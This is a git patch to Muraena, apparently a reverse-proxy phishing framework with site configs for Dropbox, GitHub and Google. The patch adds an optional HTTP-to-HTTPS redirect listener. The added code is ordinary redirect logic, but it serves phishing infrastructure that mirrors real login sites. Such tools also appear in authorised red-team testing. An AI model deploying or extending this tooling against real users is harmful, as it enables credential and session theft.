From c3fbb85512a602e16b4de9fa6d71dd9f18e19725 Mon Sep 17 00:00:00 2001 From: Ohpe <704560+ohpe@users.noreply.github.com> Date: Mon, 27 Jul 2020 17:29:26 +0200 Subject: [PATCH] new: add support for redirecting HTTP to HTTPS #29 --- config/config.json | 6 +++++- config/dropbox.json | 1 + config/github.com.json | 1 + config/google.com.json | 1 + main.go | 10 ++++++---- proxy/handler.go | 18 ++++++++++++++++++ session/config.go | 4 ++++ 7 files changed, 36 insertions(+), 5 deletions(-) diff --git a/config/config.json b/config/config.json index ff9521c..08740b0 100755 --- a/config/config.json +++ b/config/config.json @@ -5,7 +5,11 @@ "listener": { "ip": "0.0.0.0", - "port": 443, + "port": 8443, + "HTTPtoHTTPS": { + "enabled": true, + "HTTPport": 8080 + } }, "skipContentType": [ diff --git a/config/dropbox.json b/config/dropbox.json index 409a3dd..98251d2 100755 --- a/config/dropbox.json +++ b/config/dropbox.json @@ -6,6 +6,7 @@ "listener": { "ip": "0.0.0.0", "port": 443, + "HTTPtoHTTPS": true }, "skipContentType": [ diff --git a/config/github.com.json b/config/github.com.json index 0cf6b66..977a026 100755 --- a/config/github.com.json +++ b/config/github.com.json @@ -6,6 +6,7 @@ "listener": { "ip": "0.0.0.0", "port": 443, + "HTTPtoHTTPS": true }, "skipContentType": [ diff --git a/config/google.com.json b/config/google.com.json index fdc0377..2256ea1 100755 --- a/config/google.com.json +++ b/config/google.com.json @@ -6,6 +6,7 @@ "listener": { "ip": "0.0.0.0", "port": 443, + "HTTPtoHTTPS": true }, "skipContentType": [ diff --git a/main.go b/main.go index 172f1b5..0ac737b 100644 --- a/main.go +++ b/main.go @@ -101,9 +101,6 @@ func main() { s.HandleFood(w, r) }) - - - listeningAddress := fmt.Sprintf("%s:%d", sess.Config.Proxy.Listener.IP, sess.Config.Proxy.Listener.Port) lline := fmt.Sprintf("Muraena is alive on %s\n[ %s ] ==> [ %s ]", tui.Green(listeningAddress), tui.Yellow(sess.Config.Proxy.Phishing), tui.Green(sess.Config.Proxy.Target)) @@ -116,6 +113,12 @@ func main() { CertPool: sess.Config.TLS.Root, } + if sess.Config.Proxy.Listener.HTTPtoHTTPS.Enabled { + // redirect HTTP > HTTPS + listingHTTP := fmt.Sprintf("%s:%d", sess.Config.Proxy.Listener.IP, sess.Config.Proxy.Listener.HTTPtoHTTPS.HTTPport) + go http.ListenAndServe(listingHTTP, proxy.RedirectToHTTPS(sess.Config.Proxy.Listener.Port)) + } + if err := tlsServer.ServeTLS(listeningAddress); err != nil { log.Fatal("Error binding Muraena on HTTPS: %s", err) } @@ -126,5 +129,4 @@ func main() { } } - } diff --git a/proxy/handler.go b/proxy/handler.go index a07e2aa..d592f96 100644 --- a/proxy/handler.go +++ b/proxy/handler.go @@ -7,6 +7,7 @@ import ( "io/ioutil" "net/http" "net/url" + "regexp" "strconv" "strings" @@ -45,6 +46,23 @@ type SessionType struct { Replacer *Replacer } +func RedirectToHTTPS(port int) http.HandlerFunc { + + return func(w http.ResponseWriter, req *http.Request) { + + var re = regexp.MustCompile(`(:\d+)$`) + host := re.ReplaceAllString(req.Host, "") + + newURL := fmt.Sprintf("https://%s%s", host, req.URL.String()) + if port != 443 { + newURL = fmt.Sprintf("https://%s:%d%s", host, port, req.URL.String()) + } + + log.Info("Redirecting HTTP to HTTPS: %s", newURL) + http.Redirect(w, req, newURL, http.StatusMovedPermanently) + } +} + func (muraena *MuraenaProxy) RequestBodyProcessor(request *http.Request, track *tracking.Trace, base64 Base64) (err error) { if request.Body != nil { diff --git a/session/config.go b/session/config.go index 48ee1a4..85fe4e7 100644 --- a/session/config.go +++ b/session/config.go @@ -28,6 +28,10 @@ type Configuration struct { Listener struct { IP string `json:"IP"` Port int `json:"port"` + HTTPtoHTTPS struct { + Enabled bool `json:"enabled"` + HTTPport int `json:"HTTPport"` + } `json:"HTTPtoHTTPS"` } `json:"listener"` SkipContentType []string `json:"skipContentType"`